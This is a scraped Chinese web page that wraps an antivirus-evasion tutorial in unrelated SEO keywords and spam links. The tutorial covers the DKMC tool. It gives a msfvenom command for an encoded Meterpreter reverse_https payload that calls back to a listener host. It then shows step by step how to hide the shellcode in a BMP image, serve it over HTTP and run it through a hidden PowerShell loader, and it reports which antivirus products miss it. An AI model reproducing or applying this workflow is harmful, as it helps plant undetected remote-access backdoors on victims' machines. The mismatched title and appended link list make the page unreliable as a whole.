当前位置: 首页 > news >正文

互联网站管理工作细则wordpress 360字体大小

互联网站管理工作细则,wordpress 360字体大小,网站建站策划,团队建设思路和方案0x01 免杀能力一览表 几点说明#xff1a; 1、上表中标识 √ 说明相应杀毒软件未检测出病毒#xff0c;也就是代表了Bypass。 2、为了更好的对比效果#xff0c;大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全…0x01 免杀能力一览表 几点说明 1、上表中标识 √ 说明相应杀毒软件未检测出病毒也就是代表了Bypass。 2、为了更好的对比效果大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒所以默认情况下360和火绒杀毒情况指的是静态动态查杀。360杀毒版本5.0.0.8160(2020.01.01)火绒版本5.0.34.16(2020.01.01)360安全卫士12.0.0.2002(2020.01.01)。 4、其他杀软的检测指标是在virustotal.com简称VT上在线查杀所以可能只是代表了静态查杀能力数据仅供参考不足以作为免杀的精确判断指标。 5、完全不必要苛求一种免杀技术能bypass所有杀软这样的技术肯定是有的只是没被公开一旦公开第二天就能被杀了其实我们只要能bypass目标主机上的杀软就足够了。 0x02 DKMC介绍 DKMC是Don’t Kill My Cat (DKMC)的简称谷歌翻译为不要杀害我的小猫咪这个名字也是挺少女心的…DKMC是一种生成混淆的shellcode的工具并把shellcode合成到图像文件中最终依靠PowerShell执行最终的shellcode有效负载。 0x03 安装DKMC 安装比较简单 $ git clone https://github.com/Mr-Un1k0d3r/DKMC $ cd DKMC $ mkdir output执行python dkmc.py即可 0x04 DKMC使用说明 执行python dkmc.py后可以看到5个选项 [*] (gen) Generate a malicious BMP image [*] (web) Start a web server and deliver malicious image [*] (ps) Generate Powershell payload [*] (sc) Generate shellcode from raw file [*] (exit) Quit the application翻译一下 [*] (gen) 将msf的shellcode注入到一个BMP图像 [*] (web) 启动web服务用来分发BMP图像 [*] (ps) 生成ps的payload [*] (sc) 将msf生成的raw文件转为shellcode [*] (exit) 退出这几个选项可不是都能生成payload而是一起组合来生成免杀的文件。 生成一个后门的流程大体为 1、先利用msf生成raw文件 2、利用sc讲raw文件转换为shellcode 3、利用gen将上一步的shellcode注入到一个BMP图像 4、利用ps生成基于powershell的BMP文件的payload 5、利用web提供的简单web服务进行分发BMP文件 4和5看起来有点乱下面我演示一下就很容易明白了。 0x05 利用DKMC生成后门 1、先利用Msf生成raw格式的shellcode稍微编码了一下 msfvenom -p windows/meterpreter/reverse_https LHOST10.211.55.2 LPORT3333 -e x86/shikata_ga_nai -b \x00 -i 5 -a x86 -f raw -o /root/test15.raw2、在主菜单中选择sc,然后设置source为/root/test15.raw,再执行run生成shellcode。 复制一下生成的shellcode,输入exit退回到主菜单。 3、在主菜单中选择gen,然后设置shellcode为上一步中生成的shellcode。 其他默认即可执行run生成图像。 看到生成了output-1577907077.bmp图像文件输入exit退回到主菜单。 4、在主菜单中选择ps,设置url地址这个url地址就是web分发图像文件的地址。 我的parrot虚拟机的地址为10.211.55.24我打算用默认的80端口这样我的url地址为http://10.211.55.24/output-1577907077.bmp 使用命令set url http://10.211.55.24/output-1577907077.bmp然后执行run生成powershell执行脚本。 复制一下生成的ps代码输入exit退回到主菜单。 5、最后一步在主菜单中选择web,使用默认80端口执行run即可。 访问虚拟机的80端口 图像可以正常打开 6、在我的测试机器上执行第4步生成的ps代码不开杀软的时候可正常上线 我将ps执行代码中的-w hidden先去掉这样可以看得直观一些 7、打开杀软进行测试 静态查杀都通过 在执行powershell代码时火绒和360卫士会拦截报警360杀毒没有反应 0x05 小结 DKMC主要把shellcode注入到bmp图像中然后使用powershell来执行其中的shellcode但是很多杀软都会监测powershell的执行动作所以virustotal.com的静态检测不足以说明什么。其实还可以进一步对ps执行代码进行混淆免杀这一点后续文章还会涉及这里就不展开说 参考 官方说明文档https://github.com/Mr-Un1k0d3r/DKMC
http://www.yutouwan.com/news/277109/

相关文章:

  • 电子商务网站网站建设wordpress 主题插件
  • 沂源网站开发论坛网站怎么做
  • 毕业设计网站设计说明书注册网站网
  • 描述网站建设规范方法网站建设套餐内容
  • 网站做301根目录在哪里wordpress怎么保持缩略图尺寸不变
  • 个人 网站备案微信公众号移动网站开发
  • 可做外链的视频网站广州抖音推广
  • 建设厅电工证查询网站天猫建设网站的意义
  • 品牌宣传型企业网站长沙装修
  • 云电脑注册网站首页wordpress 注册邀请码
  • 苏州建设公司网站唐山建设公司网站
  • 焦作网站建设服务爱妮微如何做网站链接的网址
  • 通达oa 做网站深圳市大鹏建设局网站
  • 做网站学哪些语言给别人做网站用做假酒验证
  • 提高网站的访问速度网站怎么做付费项目
  • 网站技术建设方案高邮城乡建设局 网站
  • 哪些网站是单页应用怎样建微信公众号
  • 公司门户网站建设做网站需要懂程序吗
  • 桂平做网站公司上海临港自贸区注册公司
  • wordpress站点美化网站制作维护费 归属
  • 登陆建设银行wap网站网站建设中怎么回事
  • 店面设计费用西青seo
  • 广州做网站多少钱中山做网站公司哪家好
  • 山西省财政厅网站三基建设专栏网站集约化建设工作打算
  • wordpress 企业网站主题谷歌seo搜索
  • 本地服务器如何做网站百度一下你就知道主页
  • 从化高端网站建设岳阳网站开发建设
  • 网站常用英文建设网站费用吗
  • 房地产微网站模板上海公司买房需要什么条件
  • 东莞一站式网站建设企业网站后台管理系统